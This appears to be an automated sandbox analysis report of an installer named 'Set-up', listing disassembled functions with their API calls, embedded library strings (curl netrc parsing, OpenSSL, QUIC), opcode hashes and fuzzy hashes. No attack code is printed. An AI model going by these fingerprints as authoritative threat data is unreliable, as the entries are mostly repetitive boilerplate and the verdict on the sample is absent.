netrc.c, xrefs: 00AC6243, 00AC6541, 00AC655C, 00AC6609, 00AC6627, 00AC66DD, 00AC66F7, 00AC670E, 00AC673F, 00AC676B

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: default$login$macdef$machine$netrc.c$password
API String ID: 0-1043775505
Opcode ID: 5d1957bdb952dc8ecb432a360e58080e35cfc4a564b431449c9531574582b129
Instruction ID: 114ce6ca78db4cb999318bcaf86cdf8ee1ab4e232df8f2a28d5d2e506fa70157
Opcode Fuzzy Hash: 5d1957bdb952dc8ecb432a360e58080e35cfc4a564b431449c9531574582b129
Instruction Fuzzy Hash: 3DE105B09083819BE711CF149985F2B7BE4AF86718F19482CF8C55B382E3B9D948D793

Function 00DB48A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 1070COMMON

Download Yara Rule

Strings

BQ`, xrefs: 00DB4F64

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: BQ`
API String ID: 0-1649249777
Opcode ID: 5c0ae10d8b821740135186c74aef795f2b4aeba1074306054197b5a6e4e929f0
Instruction ID: b944bd9233b67a25b7e1b9559a40f82a27ee44b622e51df0d4d5de9c2510aea6
Opcode Fuzzy Hash: 5c0ae10d8b821740135186c74aef795f2b4aeba1074306054197b5a6e4e929f0
Instruction Fuzzy Hash: 16A2C271A08716DFC718CF19C4806A9F7E1FF88310F19866DE9AA87786D734E851CBA1

Function 00BD00F0 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 404stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,00C52212,00000000,00000000), ref: 00BD0109

Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8

Strings

a2d_ASN1_OBJECT, xrefs: 00BD0128, 00BD014A, 00BD05BD
1, xrefs: 00BD0328
crypto/asn1/a_object.c, xrefs: 00BD012F, 00BD0151, 00BD039E, 00BD03B4, 00BD05C3, 00BD05FC, 00BD062C

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen$strcpy
String ID: 1$a2d_ASN1_OBJECT$crypto/asn1/a_object.c
API String ID: 2790333442-843477118
Opcode ID: 3156254d5c80e73c367a44144bcbb611ae2b1165ff8837e0978d577dbbb33ec6
Instruction ID: 569c36a7c3ed45a143930c2e1293863079009ea15ff72296dc2e76301021a45d
Opcode Fuzzy Hash: 3156254d5c80e73c367a44144bcbb611ae2b1165ff8837e0978d577dbbb33ec6
Instruction Fuzzy Hash: 49E146719183018BD721AB29D88172EF7E1EFA1754F048B6EF9C8A7352F330D9409B82

Function 00B0E070 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 436COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - buf->last) == len,nghttp3_qpack.c,000007B9,?,?,?,?,?,?,?,00B0C1CE,?,00000003,?), ref: 00B0E4EE

Strings

(size_t)(p - buf->last) == len, xrefs: 00B0E4E9
nghttp3_qpack.c, xrefs: 00B0E4E4

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - buf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-1997541155
Opcode ID: 573355966cc4794964b154c005add98c0890fb56a94b8f5b2ff1cc9b62a275f7
Instruction ID: 293eb75ad3eb240d884f37ad0e05b89565bb3296f8b399780fb3334aff98f975
Opcode Fuzzy Hash: 573355966cc4794964b154c005add98c0890fb56a94b8f5b2ff1cc9b62a275f7
Instruction Fuzzy Hash: E5E1F532B042105BD7199E3CC88076EBBD7ABD9310F298ABCE9A9C73D1D635DC488785

Function 00CCE5D0 Relevance: 5.1, APIs: 3, Instructions: 1393COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,00000400), ref: 00CCE5F2
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00CCE67F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00CD003E

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 3a391d511467ddb5f537e882b9362640c7bf7ea1551cc069b280310a7062ed2a
Instruction ID: 211936e0a6a683ab1c8a392a064a8753a84e661ecdb772d662511de60934c918
Opcode Fuzzy Hash: 3a391d511467ddb5f537e882b9362640c7bf7ea1551cc069b280310a7062ed2a
Instruction Fuzzy Hash: E7D23DEAC39B9541E323A67D64522E6E7506FFB248F11EB2BFCD430E52AB2171C44319

Function 00DDE940 Relevance: 4.9, Strings: 3, Instructions: 1163COMMON

Download Yara Rule

Strings

4, xrefs: 00DDEA6D
`, xrefs: 00DDFE82
`, xrefs: 00DDF8D3

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: 4$`$`
API String ID: 0-1230936812
Opcode ID: 518259cf26a65d942b1d12550548d8e316fbec725f132a278fc422b5876ac12f
Instruction ID: 61f024e39718ba46bea6c6d6207248507a629f21ea5ee2ec5bdb886009664711
Opcode Fuzzy Hash: 518259cf26a65d942b1d12550548d8e316fbec725f132a278fc422b5876ac12f
Instruction Fuzzy Hash: 86B29F729087918FD715CF18C8806AAB7E1FFCA304F198B2EE8D597356D730A945CB92

Function 00DD62D0 Relevance: 4.4, Strings: 3, Instructions: 694COMMON

Download Yara Rule

Strings

, xrefs: 00DD692B
, xrefs: 00DD69F8
, xrefs: 00DD6AA6

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: $ $
API String ID: 0-3665324030
Opcode ID: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
Instruction ID: 34d786431895bd97a553f63222f3d5c3b9a97c5321eb7b97232c10be3bfec6a6
Opcode Fuzzy Hash: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
Instruction Fuzzy Hash: 1262CE759083918FC324CF29C49066AFBE1BFC8350F158A2EE9D993355E734E945CBA2

Function 00B824A0 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

ssl/quic/quic_record_shared.c, xrefs: 00B82524, 00B825A8, 00B82752, 00B827EB
quic hpquic kuossl_qrl_enc_level_set_key_update, xrefs: 00B82680
ossl_qrl_enc_level_set_provide_secret, xrefs: 00B8251A, 00B8259E, 00B82748, 00B827E1

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: ossl_qrl_enc_level_set_provide_secret$quic hpquic kuossl_qrl_enc_level_set_key_update$ssl/quic/quic_record_shared.c
API String ID: 0-2745174052
Opcode ID: d1a3298af084a29f0785fdce726c0d24faebe86a85c3848b9cbd63b8940d18d6
Instruction ID: e2c6c10ed81784f54bfeead237cc1736c90889145887e294d8f310644063c06d
Opcode Fuzzy Hash: d1a3298af084a29f0785fdce726c0d24faebe86a85c3848b9cbd63b8940d18d6
Instruction Fuzzy Hash: B0D10471608341ABEB30AB51DC82F6BB7E5FF94704F04086CF989572A2E771E844E762

Function 00DD0560 Relevance: 3.4, APIs: 2, Instructions: 932COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12ff8a4c8aa474db4f82cbe38701c0a02b1d83f955c9fb16d0096dd1bf271074
Instruction ID: 7985c1df8e497a9637a2d4366c33e195de5ea47d0588b34bfc9792063a059d61
Opcode Fuzzy Hash: 12ff8a4c8aa474db4f82cbe38701c0a02b1d83f955c9fb16d0096dd1bf271074
Instruction Fuzzy Hash: 29828D72A087559FC724CF28C88066AFBE1FBC4704F198A2EE9D997351D770E845CB92

Function 00CCE138 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00CCE16E

Strings

providers/implementations/kdfs/argon2.c, xrefs: 00CCE315, 00CCE328

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: providers/implementations/kdfs/argon2.c
API String ID: 3510742995-3406374482
Opcode ID: 3659c0edd7248f321d71a78d199acf1be9466a2d8592e6797555789e3ee697a1
Instruction ID: c5d7ca854cc35b1df608f02aeebef4978268f78a8f93768204d457b12b1d8db5
Opcode Fuzzy Hash: 3659c0edd7248f321d71a78d199acf1be9466a2d8592e6797555789e3ee697a1
Instruction Fuzzy Hash: 52513771D087109BC310EB28D841B9AF7E8FF98354F558E2DE986A7242E731F6858785

Function 00A76080 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00A7608E
BCryptGenRandom.BCRYPT(00000000,?,?,00000002), ref: 00A7609C

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: CryptRandommemset
String ID:
API String ID: 642379960-0
Opcode ID: ed3a7cbaad8e65eee748a71967fda291a8ccc576b531fdca0ca96a0362d7ea6c
Instruction ID: 54cd8b33e942b514fc85ca8324a8bf8ed4c6e3906c9aa358507d9a6d1b0943c2
Opcode Fuzzy Hash: ed3a7cbaad8e65eee748a71967fda291a8ccc576b531fdca0ca96a0362d7ea6c
Instruction Fuzzy Hash: 48D05E3270939137D664611A6C17F5F5A9CDFC6B20F08402EB508E2282D660A80182B5

Function 00DE0940 Relevance: 2.8, Strings: 1, Instructions: 1582COMMON

Download Yara Rule

Strings

, xrefs: 00DE11EA

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6037acdf8c0d040dffe266aa353b1557a857fd1a7bfed82e7ae6749c841beb1b
Instruction ID: 6f38129303464fc877bf2f844220554c9004fec1641a4443e319cf66d3c23caa
Opcode Fuzzy Hash: 6037acdf8c0d040dffe266aa353b1557a857fd1a7bfed82e7ae6749c841beb1b
Instruction Fuzzy Hash: E3E25835A083A18BC714DF6AD49052EFBE2AFC8304F198A2DE9D997351D770EC45CB92

Function 00DB4410 Relevance: 2.8, APIs: 2, Instructions: 316COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,?,?,?,?,00000000,?,?,00DB22FC,?,?), ref: 00DB447B
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000001), ref: 00DB4760

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: dc9a334733edc32cf4ee8a4c3e5a5cdcdceb2bad33b265439c94dedbe301da4f
